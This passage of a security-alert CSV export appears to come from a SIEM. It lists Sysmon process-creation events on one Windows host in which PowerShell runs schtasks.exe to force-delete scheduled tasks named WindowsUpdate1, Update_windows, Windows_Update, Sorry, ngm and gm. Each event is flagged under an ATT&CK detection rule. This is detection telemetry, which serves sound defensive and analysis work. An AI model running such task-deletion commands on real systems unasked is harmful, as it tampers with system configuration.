Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.463",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.381 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010a7a12100} +ProcessId: 7068 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.384659500Z"",""eventRecordID"":""2801"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.381\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010a7a12100}\r\nProcessId: 7068\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.381"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010a7a12100}"",""processId"":""7068"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.450",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.347 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001012a02100} +ProcessId: 6544 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.351820100Z"",""eventRecordID"":""2800"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.347\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001012a02100}\r\nProcessId: 6544\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:31.347"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001012a02100}"",""processId"":""6544"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.417",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.313 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00107c9e2100} +ProcessId: 3276 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.317220200Z"",""eventRecordID"":""2799"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.313\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00107c9e2100}\r\nProcessId: 3276\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.313"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00107c9e2100}"",""processId"":""3276"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.400",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.274 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010bf9c2100} +ProcessId: 336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.280084100Z"",""eventRecordID"":""2798"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.274\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010bf9c2100}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.274"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010bf9c2100}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.384",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.225 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010ed9a2100} +ProcessId: 2096 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.230922300Z"",""eventRecordID"":""2797"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.225\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010ed9a2100}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.225"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010ed9a2100}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.370",14,"ATT&CK T1064: Windows 
Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.160 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00103b992100} +ProcessId: 4884 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.171889000Z"",""eventRecordID"":""2796"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.160\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00103b992100}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.160"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00103b992100}"",""processId"":""4884"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
